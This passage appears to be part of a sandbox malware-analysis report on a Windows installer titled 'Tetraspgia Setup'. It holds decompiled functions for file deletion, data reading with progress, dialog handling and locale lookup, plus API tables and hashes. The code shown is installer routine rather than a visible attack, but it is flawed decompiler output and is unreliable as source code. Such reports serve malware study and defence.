0x004067e6
0x004067eb
0x00406804
0x0040680d
0x00406812
0x00406817
0x0040682d
0x00406832
0x00406834
0x00406858
0x00406836
0x00406836
0x00406838
0x0040684d
0x0040683a
0x0040683d
0x00406846
0x00406846
0x00406838
0x00406819
0x0040681e
0x00406820
0x00406824
0x00406824
0x00406820
0x00000000
0x00406817
0x004067ed
0x004067f3
0x00000000
0x00000000
0x004067f5
0x004067fa
0x00000000
0x00000000
0x004067fc
0x00406802
0x00000000
0x00000000
0x00000000
0x0040685d
0x00406863
0x0040686b
0x0040686d
0x0040686d
0x00406875
0x00000000
0x00406875
0x00000000
0x004067b0
0x00406767
0x00406767
0x00406769
0x004068c9
0x004068c9
0x004068d9
0x00000000
0x004068d9
0x0040676f
0x00406772
0x00406892
0x00406893
0x00406898
0x0040689a
0x00000000
0x00000000
0x0040689d
0x004068a9
0x004068ae
0x004068b0
0x004068d4
0x00000000
0x004068d4
0x004068b2
0x004068b4
0x00000000
0x00000000
0x004068b9
0x004068c2
0x00000000
0x004068c2
0x00000000
0x00406772

APIs

Part of subcall function 00406638: lstrlenW.KERNEL32(004305C0,00000000,004305C0,004305C0,00000000,?,?,0040673B,?,00000000,76A83420,?), ref: 0040668C
Part of subcall function 00406638: GetFileAttributesW.KERNEL32(004305C0,004305C0), ref: 0040669D

DeleteFileW.KERNELBASE(?,?,00000000,76A83420,?), ref: 00406745
lstrcatW.KERNEL32(0042FDC0,\*.*), ref: 00406797
lstrcatW.KERNEL32(?,004092B0), ref: 004067B8
lstrlenW.KERNEL32(?), ref: 004067BB
FindFirstFileW.KERNEL32(0042FDC0,?), ref: 004067D2
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406863
FindClose.KERNEL32(00000000), ref: 00406875

Strings

\*.*, xrefs: 0040678D

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
Instruction ID: dccc3e871a12a5ab9d695c44a96518fee9cafe6829caada924bdb8552f231abd
Opcode Fuzzy Hash: ec35ec8144d1065000fb23a15f3631645bd2442b6bc3530db3f1337977a5d6e6
Instruction Fuzzy Hash: 084106322067116AD7207B259C49A6B73A8EF41318F16893FF943F21D1E73C8D6586AF

Uniqueness

Uniqueness Score: -1.00%

Function 00403148 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00403148(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v124;
				short _v132;
				intOrPtr _v136;
				signed int _v140;
				int _v144;
				intOrPtr _v148;
				long _v152;
				signed int _v156;
				signed int _v160;
				void* _t39;
				void* _t40;
				signed int _t41;
				void* _t45;
				long _t47;
				signed int _t50;
				intOrPtr _t52;
				intOrPtr _t53;
				long _t55;
				long _t56;
				void* _t57;
				intOrPtr _t71;
				signed int _t73;
				intOrPtr _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t81;
				int _t82;
				signed int* _t83;

				_t83 =  &_v156;
				_t72 = _a4;
				_t74 = _a12;
				_t71 =  !=  ? _a16 : 0x8000;
				_t77 = 0;
				_t37 =  !=  ? _t74 : 0x423538;
				_v144 =  !=  ? _t74 : 0x423538;
				if(_a4 >= 0) {
					E00403131( *0x435a58 + _t72);
				}
				_t39 = E00406948(_t72,  *0x40b010,  &_v156, "true"); // executed
				if(_t39 == 0) {
					L31:
					_push(0xfffffffd);
					goto L32;
				} else {
					_t41 = _v156;
					if(_t41 >= 0) {
						if(_t74 != 0) {
							_t77 =  <  ? _t41 : _a16;
							if(E0040311B(_t74, _t77) != 0) {
								L20:
								return _t77;
							}
							goto L31;
						}
						if(_t41 <= 0) {
							goto L20;
						}
						while(1) {
							_t76 =  <  ? _t41 : _t71;
							if(E0040311B(0x41f538, _t76) == 0) {
								goto L31;
							}
							_t45 = E00406A0B(_t72, _a8, 0x41f538, _t76); // executed
							if(_t45 == 0) {
								L29:
								_push(0xfffffffe);
								L32:
								_pop(_t40);
								return _t40;
							}
							_t77 = _t77 + _t76;
							_t41 = _v156 - _t76;
							_v156 = _t41;
							if(_t41 > 0) {
								continue;
							}
							goto L20;
						}
						goto L31;
					}
					_t47 = GetTickCount();
					 *0x40dea4 =  *0x40dea4 & _t77;
					 *0x40dea0 =  *0x40dea0 & _t77;
					_v152 = _t47;
					 *0x417530 = 0x40f528;
					 *0x41752c = 0x40f528;
					_t50 = _v156 & 0x7fffffff;
					 *0x40d988 = 8;
					_t73 = _t50;
					 *0x417528 = 0x417528;
					_v140 = _t50;
					_v156 = _t73;
					if(_t50 <= 0) {
						goto L20;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t81 =  <  ? _t73 : 0x4000;
						if(E0040311B(0x41f538, 0x4000) == 0) {
							goto L31;
						}
						_v156 = _v156 - 0x4000;
						 *0x40d97c = _t81;
						_t82 = _v144;
						 *0x40d978 = 0x41f538;
						while(1) {
							_push(0x40d978);
							 *0x40d980 = _t82;
							 *0x40d984 = _t71;
							_t52 = E0040728E();
							_v136 = _t52;
							if(_t52 < 0) {
								break;
							}
							_t53 =  *0x40d980; // 0x423538
							_v152 = _t53 - _t82;
							_t55 = GetTickCount();
							_t73 = _v160;
							_v140 = _t55;
							if(( *0x435af4 & 0x00000001) != 0 && (_t55 - _v156 > 0xc8 || _t73 == 0)) {
								wsprintfW( &_v132, L"... %d%%", MulDiv(_v144 - _t73, "true", _v144));
								_t83 =  &(_t83[3]);
								E00405D3A(0,  &_v124);
								_t73 = _v160;
								_v156 = _v140;
							}
							_t56 = _v152;
							if(_t56 == 0) {
								if(_t73 > 0) {
									goto L5;
								}
								goto L20;
							} else {
								if(_t74 != 0) {
									_t82 =  *0x40d980; // 0x423538
									_t71 = _t71 - _t56;
									_v148 = _t82;
									L17:
									_t77 = _t77 + _t56;
									if(_v136 != 1) {
										continue;
									}
									goto L20;
								}
								_t57 = E00406A0B(_t73, _a4, _t82, _t56); // executed
								if(_t57 == 0) {
									goto L29;
								}
								_t56 = _v152;
								goto L17;
							}
						}
						_push("true");
						goto L32;
					}
					goto L31;
				}
			}

0x00403148
0x0040314e
0x0040315e
0x0040316c
0x00403174
0x00403178
0x0040317b
0x00403181
0x0040318b
0x0040318b
0x0040319d
0x004031a4
0x00403379
0x00403379
0x00000000
0x004031aa
0x004031aa
0x004031b0
0x0040331d
0x0040336b
0x00403377
0x00403313
0x00000000
0x00403313
0x00000000
0x00403377
0x00403321
0x00000000
0x00000000
0x00403328
0x0040332c
0x00403338
0x00000000
0x00000000
0x00403343
0x0040334a
0x0040335e
0x0040335e
0x0040337b
0x0040337b
0x00000000
0x0040337b
0x00403350
0x00403352
0x00403354
0x0040335a
0x00000000
0x00000000
0x00000000
0x0040335c
0x00000000
0x00403328
0x004031b6
0x004031bc
0x004031c2
0x004031c8
0x004031d1
0x004031d6
0x004031df
0x004031e4
0x004031ee
0x004031f0
0x004031fa
0x004031fe
0x00403202
0x00000000
0x00000000
0x00000000
0x00000000
0x00403208
0x00403208
0x0040320f
0x0040321f
0x00000000
0x00000000
0x00403225
0x00403229
0x0040322f
0x00403233
0x0040323d
0x0040323d
0x00403242
0x00403248
0x0040324e
0x00403253
0x00403259
0x00000000
0x00000000
0x0040325f
0x00403266
0x0040326a
0x00403277
0x0040327b
0x0040327f
0x004032ab
0x004032b1
0x004032bb
0x004032c4
0x004032c8
0x004032c8
0x004032cc
0x004032d2
0x0040330d
0x00000000
0x00000000
0x00000000
0x004032d4
0x004032d6
0x004032f0
0x004032f6
0x004032f8
0x004032fc
0x004032fc
0x00403303
0x00000000
0x00000000
0x00000000
0x00403309
0x004032e1
0x004032e8
0x00000000
0x00000000
0x004032ea
0x00000000
0x004032ea
0x004032d2
0x00403317
0x00000000
0x00403317
0x00000000
0x00403208

APIs

GetTickCount.KERNEL32 ref: 004031B6
GetTickCount.KERNEL32 ref: 0040326A
MulDiv.KERNEL32(?,?,?), ref: 0040329A
wsprintfW.USER32 ref: 004032AB

Part of subcall function 00403131: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004035D7,?,?,?,?,?,?), ref: 0040313F

Strings

85B, xrefs: 00403155
85B, xrefs: 00403242, 0040325F, 004032F0
... %d%%, xrefs: 004032A5

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CountTick$FilePointerwsprintf
String ID: ... %d%%$85B$85B
API String ID: 999035486-2772677642
Opcode ID: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
Instruction ID: e2bf7c2ae867e5e0c149cd35682d72f4c4d2633ef795981e2bf4a0daba4be17b
Opcode Fuzzy Hash: 2ba54163d51c3a8551e8519958d675213576959048d36eb55140e7cadd9fce55
Instruction Fuzzy Hash: 355180716083019BD710DF69DD84A2BBBE8AB84756F10493FFC54E7291DB38DE088B5A

Uniqueness

Uniqueness Score: -1.00%

Function 004065CF Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065CF(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4321c0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x4321c0;
			}

0x004065da
0x004065e3
0x00000000
0x004065f0
0x004065e6
0x00000000

APIs

FindFirstFileW.KERNELBASE(00000000,004321C0,00000000,0040667C,004305C0), ref: 004065DA
FindClose.KERNELBASE(00000000), ref: 004065E6

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
Instruction ID: 9bce445b90ad5ff1b83c175b3b927286731ee1a5929a82a3f0dae3cb9bd988e9
Opcode Fuzzy Hash: d9e00b7f11b8670b58f1de5a54c434da9086a4a904ca4075b7418d89ed5cb961
Instruction Fuzzy Hash: 64D012756051316BD70057787E0CC8B7F699F05330F158A36B066F11F5D7748C6196AC

Uniqueness

Uniqueness Score: -1.00%

Function 00404F92 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00404F92(struct HWND__* _a4, int _a8, signed int _a12, long _a16) {
				signed int _v32;
				struct HWND__* _v40;
				void* _v84;
				void* _v88;
				signed int _t51;
				signed int _t53;
				intOrPtr _t55;
				struct HWND__* _t58;
				signed int _t67;
				int _t77;
				struct HWND__* _t113;
				struct HWND__* _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				struct HWND__* _t142;
				signed int _t143;
				long _t146;
				int _t149;
				struct HWND__* _t156;
				void* _t159;

				_t137 = _a4;
				_t143 = _a8;
				if(_t143 == 0x110 || _t143 == 0x408) {
					_t139 = _a12;
					 *0x42dd48 = _t139;
					if(_t143 == 0x110) {
						 *0x4349f8 = _t137;
						 *0x42dd54 = GetDlgItem(_t137, 1);
						_t113 = GetDlgItem(_t137, 2);
						_push(0xffffffff);
						_push("true");
						 *0x42dd58 = _t113;
						E0040551A(_t137);
						SetClassLongW(_t137, 0xfffffff2,  *0x4349d8);
						 *0x4349ec = E00401533("true");
						_t139 = 1;
						 *0x42dd48 = 1;
					}
					_t51 =  *0x40b014; // 0x0
					_t146 = (_t51 << 6) +  *0x435a20;
					if(_t51 < 0) {
						L38:
						E004054E8(0x40b);
						while(1) {
							_t140 =  *0x40b014; // 0x0
							_t53 =  *0x42dd48;
							_t141 = _t140 + _t53;
							_t146 = _t146 + (_t53 << 6);
							 *0x40b014 = _t141;
							_t55 =  *0x435a24;
							if(_t141 == _t55) {
								E00401533(1);
								_t55 =  *0x435a24;
								_t141 =  *0x40b014; // 0x0
							}
							if( *0x4349ec != 0 || _t141 >= _t55) {
								break;
							}
							_push( *((intOrPtr*)(_t146 + 0x24)));
							_push(0x445000);
							_a12 =  *((intOrPtr*)(_t146 + 0x14));
							E00405EBA();
							_push( *((intOrPtr*)(_t146 + 0x20)));
							_push(0xfffffc19);
							E0040551A(_t137);
							_push( *((intOrPtr*)(_t146 + 0x1c)));
							_push(0xfffffc1b);
							E0040551A(_t137);
							_push( *((intOrPtr*)(_t146 + 0x28)));
							_push(0xfffffc1a);
							E0040551A(_t137);
							_t142 = GetDlgItem(_t137, 3);
							_t67 = _v32;
							_v40 = _t142;
							if( *0x435acc != 0) {
								_t67 = _t67 & 0xfffffefd | 0x00000004;
								 *(_t159 + 0x2c) = _t67;
							}
							ShowWindow(_t142, _t67 & 0x00000008); // executed
							EnableWindow( *(_t159 + 0x28),  *(_t159 + 0x2c) & 0x00000100); // executed
							EnableWindow( *0x42dd54,  *(_t159 + 0x2c) & 0x00000002); // executed
							_t77 =  *(_t159 + 0x2c) & 0x00000004;
							 *(_t159 + 0x34) = _t77;
							EnableWindow( *0x42dd58, _t77);
							if( *(_t159 + 0x2c) == 0) {
								_push(1);
							} else {
								_push(0);
							}
							EnableMenuItem(GetSystemMenu(_t137, 0), 0xf060, ??);
							SendMessageW( *(_t159 + 0x30), "true", 0, 1);
							if( *0x435acc == 0) {
								_push( *0x42dd54);
							} else {
								SendMessageW(_t137, 0x401, 2, 0);
								_push( *0x42dd58);
							}
							E00405503();
							E00406B1A("Tetraspgia Setup: Installing", E00405D1B());
							_push( *((intOrPtr*)(_t146 + 0x18)));
							_push(0x42bd48 + lstrlenW("Tetraspgia Setup: Installing") * 2);
							E00405EBA();
							SetWindowTextW(_t137, "Tetraspgia Setup: Installing"); // executed
							_push(0);
							if(E00401399( *((intOrPtr*)(_t146 + 8))) != 0 ||  *_t146 == 0) {
								continue;
							} else {
								if( *(_t146 + 4) != 5) {
									DestroyWindow( *0x4349dc); // executed
									 *0x42dd4c = _t146;
									if( *_t146 <= 0) {
										L62:
										_t58 =  *0x4349dc;
										goto L63;
									}
									_t58 = CreateDialogParamW( *0x4349f4,  *_t146 +  *0x4349d4 & 0x0000ffff, _t137,  *(0x40b018 +  *(_t146 + 4) * 4), _t146); // executed
									 *0x4349dc = _t58;
									if(_t58 == 0) {
										goto L63;
									}
									_push( *((intOrPtr*)(_t146 + 0x2c)));
									_push(6);
									E0040551A(_t58);
									GetWindowRect(GetDlgItem(_t137, 0x3fa), _t159 + 0x10);
									ScreenToClient(_t137, _t159 + 0x10);
									SetWindowPos( *0x4349dc, 0,  *(_t159 + 0x20),  *(_t159 + 0x20), 0, 0, 0x15);
									_push(0);
									E00401399( *((intOrPtr*)(_t146 + 0xc)));
									if( *0x4349ec != 0) {
										goto L66;
									}
									ShowWindow( *0x4349dc, "true"); // executed
									E004054E8(0x405);
									goto L62;
								}
								if( *0x435acc != 0) {
									goto L66;
								}
								if( *0x435ac0 != 0) {
									continue;
								}
								goto L66;
							}
						}
						DestroyWindow( *0x4349dc);
						 *0x4349f8 = 0;
						EndDialog(_t137,  *0x42bd44);
						goto L62;
					} else {
						if(_t139 != 1) {
							L37:
							if( *_t146 == 0) {
								goto L66;
							}
							goto L38;
						}
						_push(0);
						if(E00401399( *((intOrPtr*)(_t146 + 0x10))) == 0) {
							goto L37;
						}
						SendMessageW( *0x4349dc, 0x40f, 0, 1);
						return 0 |  *0x4349ec == 0x00000000;
					}
				} else {
					if(_t143 != 0x47) {
						if(_t143 != 5) {
							if(_t143 != 0x40d) {
								if(_t143 != 0x11) {
									if(_t143 != 0x111) {
										goto L29;
									}
									_t138 = _a12;
									_t149 = _a12 & 0x0000ffff;
									_a8 = _t149;
									_t156 = GetDlgItem(_a4, _t149);
									if(_t156 == 0) {
										L16:
										if(_t149 != 1) {
											if(_t149 != 3) {
												if(_t149 != 2) {
													L28:
													SendMessageW( *0x4349dc, 0x111, _a12, _a16);
													goto L29;
												}
												if( *0x435acc == 0) {
													if(E00401533(3) != 0) {
														goto L30;
													}
													 *0x42bd44 = 1;
													L26:
													_push("true");
													L27:
													E00405958();
													goto L30;
												}
												E00401533(_t149);
												 *0x42bd44 = _t149;
												goto L26;
											}
											if( *0x40b014 <= 0) {
												goto L28;
											}
											_push(0xffffffff);
											goto L27;
										}
										_push(1);
										goto L27;
									}
									SendMessageW(_t156, 0xf3, 0, 0);
									if(IsWindowEnabled(_t156) == 0) {
										L66:
										return 0;
									}
									_t149 = _a8;
									goto L16;
								}
								SetWindowLongW(_t137, 0, 0);
								return 1;
							}
							DestroyWindow( *0x4349dc);
							_t58 = _a12;
							 *0x4349dc = _t58;
							L63:
							if( *0x42bd40 == 0 && _t58 != 0) {
								ShowWindow(_t137, 0xa); // executed
								 *0x42bd40 = 1;
							}
							goto L66;
						}
						_t138 = _a12;
						asm("sbb eax, eax");
						ShowWindow( *0x42dd50,  ~(_t138 - 1) & _t143);
						if(_t138 == 2 && (GetWindowLongW(_a4, ?str?) & 0x21010000) == 0x1000000) {
							ShowWindow(_a4, "true");
						}
						goto L30;
					} else {
						SetWindowPos( *0x42dd50, _t137, 0, 0, 0, 0, 0x13);
						L29:
						_t138 = _a12;
						L30:
						return E0040575B(_t143, _t138, _a16);
					}
				}
			}

0x00404f9b
0x00404fa4
0x00404fab
0x00405133
0x0040513d
0x00405145
0x00405149
0x00405154
0x00405159
0x0040515b
0x0040515d
0x00405160
0x00405165
0x00405173
0x00405180
0x00405185
0x00405187
0x00405187
0x0040518d
0x00405199
0x004051a1
0x004051df
0x004051e4
0x004051e9
0x004051e9
0x004051ef
0x004051f4
0x004051f9
0x004051fb
0x00405201
0x00405208
0x0040520b
0x00405210
0x00405215
0x00405215
0x00405221
0x00000000
0x00000000
0x0040522f
0x00405235
0x0040523a
0x0040523e
0x00405243
0x00405246
0x0040524c
0x00405251
0x00405254
0x0040525a
0x0040525f
0x00405262
0x00405268
0x00405276
0x00405278
0x0040527c
0x00405286
0x0040528d
0x00405290
0x00405290
0x00405299
0x004052ad
0x004052c1
0x004052cb
0x004052d5
0x004052d9
0x004052e3
0x004052e8
0x004052e5
0x004052e5
0x004052e5
0x004052f7
0x00405308
0x00405314
0x0040532d
0x00405316
0x0040531f
0x00405325
0x00405325
0x00405333
0x00405343
0x00405348
0x0040535c
0x0040535d
0x00405368
0x0040536e
0x00405379
0x00000000
0x00405387
0x0040538b
0x004053b0
0x004053b6
0x004053be
0x00405489
0x00405489
0x00000000
0x00405489
0x004053e4
0x004053ea
0x004053f1
0x00000000
0x00000000
0x004053f7
0x004053fa
0x004053fd
0x00405414
0x00405420
0x00405439
0x0040543f
0x00405443
0x0040544e
0x00000000
0x00000000
0x00405458
0x00405463
0x00000000
0x00405463
0x00405393
0x00000000
0x00000000
0x0040539f
0x00000000
0x00000000
0x00000000
0x004053a5
0x00405379
0x00405470
0x0040547c
0x00405483
0x00000000
0x004051a3
0x004051a5
0x004051d7
0x004051d9
0x00000000
0x00000000
0x00000000
0x004051d9
0x004051a7
0x004051b2
0x00000000
0x00000000
0x004051c1
0x00000000
0x004051cf
0x00404fbd
0x00404fc0
0x00404fdf
0x00405035
0x00405054
0x0040506f
0x00000000
0x00000000
0x00405075
0x00405079
0x00405081
0x0040508b
0x0040508f
0x004050b4
0x004050b9
0x004050c1
0x004050d3
0x00405106
0x00405119
0x00000000
0x00405119
0x004050dc
0x004050f5
0x00000000
0x00000000
0x004050f7
0x004050fd
0x004050fd
0x004050ff
0x004050ff
0x00000000
0x004050ff
0x004050df
0x004050e4
0x00000000
0x004050e4
0x004050ca
0x00000000
0x00000000
0x004050cc
0x00000000
0x004050cc
0x004050bb
0x00000000
0x004050bb
0x0040509b
0x004050aa
0x004054aa
0x00000000
0x004054aa
0x004050b0
0x00000000
0x004050b0
0x0040505b
0x00000000
0x00405063
0x0040503d
0x00405043
0x00405047
0x0040548e
0x00405495
0x0040549e
0x004054a4
0x004054a4
0x00000000
0x00405495
0x00404fe1
0x00404ff0
0x00404ffb
0x00405000
0x00405028
0x00405028
0x00000000
0x00404fc2
0x00404fd1
0x0040511f
0x0040511f
0x00405123
0x00000000
0x00405129
0x00404fc0

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FD1
ShowWindow.USER32(?), ref: 00404FFB
GetWindowLongW.USER32(?,?), ref: 0040500C
ShowWindow.USER32(?,?), ref: 00405028
GetDlgItem.USER32(?,00000001), ref: 0040514F
GetDlgItem.USER32(?,00000002), ref: 00405159
SetClassLongW.USER32(?,000000F2,?), ref: 00405173
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051C1
GetDlgItem.USER32(?,00000003), ref: 00405270
ShowWindow.USER32(00000000,?), ref: 00405299
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052AD
KiUserCallbackDispatcher.NTDLL(?), ref: 004052C1
EnableWindow.USER32(?), ref: 004052D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052F0
EnableMenuItem.USER32(00000000), ref: 004052F7
SendMessageW.USER32(?,?,00000000,00000001), ref: 00405308
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040531F
lstrlenW.KERNEL32(Tetraspgia Setup: Installing,?,Tetraspgia Setup: Installing,00000000), ref: 00405350

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

SetWindowTextW.USER32(?,Tetraspgia Setup: Installing), ref: 00405368

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 004053B0
CreateDialogParamW.USER32(?,?,-00435A20), ref: 004053E4

Part of subcall function 0040551A: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405534

GetDlgItem.USER32(?,000003FA), ref: 0040540D
GetWindowRect.USER32(00000000), ref: 00405414
ScreenToClient.USER32(?,?), ref: 00405420
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405439
ShowWindow.USER32(?,?,00000000), ref: 00405458

Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA

ShowWindow.USER32(?,0000000A), ref: 0040549E

Strings

Tetraspgia Setup: Installing, xrefs: 0040533E, 0040534B, 00405362

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Tetraspgia Setup: Installing
API String ID: 162979904-546952963
Opcode ID: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
Instruction ID: ac036152562477463cd4b906f759de02b60d47e3f23a7c23d24dd845f532a47a
Opcode Fuzzy Hash: 435f8b6443fc9593ff644d9f9dc2a8e4b29ac0017c4218abb197986b28d4ffe3
Instruction Fuzzy Hash: 39D19071A00A11BFDB206F61ED49A6B7BA8FB84355F00053AF506B62F1C7389851DF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405A3E Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00405A3E() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				intOrPtr* _t21;
				short _t22;
				void* _t31;
				void* _t33;
				void* _t34;
				int _t35;
				int _t40;
				int _t41;
				int _t45;
				int _t59;
				short _t66;
				WCHAR* _t69;
				signed char _t73;
				signed short _t77;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				intOrPtr _t87;
				WCHAR* _t92;
				WCHAR* _t93;
				WCHAR* _t94;

				_t87 =  *0x435a10;
				_t21 = E004068E6(2);
				_push("true");
				_pop(_t81);
				_t97 = _t21;
				if(_t21 == 0) {
					_push("true");
					_pop(_t22);
					 *0x442002 = _t22;
					L"1033" = _t81;
					 *0x442004 = 0;
					E00406977(_t81, __eflags, "true", L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42bd48, 0);
					__eflags =  *0x42bd48; // 0x54
					if(__eflags == 0) {
						E00406977(_t81, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M00409684, 0x42bd48, 0);
					}
					lstrcatW(L"1033", 0x42bd48);
				} else {
					_t77 =  *_t21(); // executed
					E0040661F(L"1033", _t77 & 0x0000ffff);
				}
				E0040597F(_t97);
				_t94 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
